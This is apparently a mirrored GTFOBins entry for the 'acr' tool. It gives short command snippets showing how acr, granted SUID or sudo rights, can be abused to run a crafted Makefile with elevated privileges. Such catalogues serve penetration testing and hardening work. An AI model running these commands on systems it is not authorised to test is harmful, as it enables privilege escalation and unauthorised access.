mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-27 22:10:48 +01:00
16 lines
344 B
Markdown
16 lines
344 B
Markdown
---
|
|
functions:
|
|
suid:
|
|
- code: |
|
|
sudo install acr $(which acr) .
|
|
touch Makefile && chmod +x Makefile
|
|
echo DATA > Makefile
|
|
./acr -r Makefile
|
|
sudo:
|
|
- code: |
|
|
sudo install acr $(which acr) .
|
|
touch Makefile && chmod +x Makefile
|
|
echo DATA > Makefile
|
|
sudo acr -r Makefile
|
|
---
|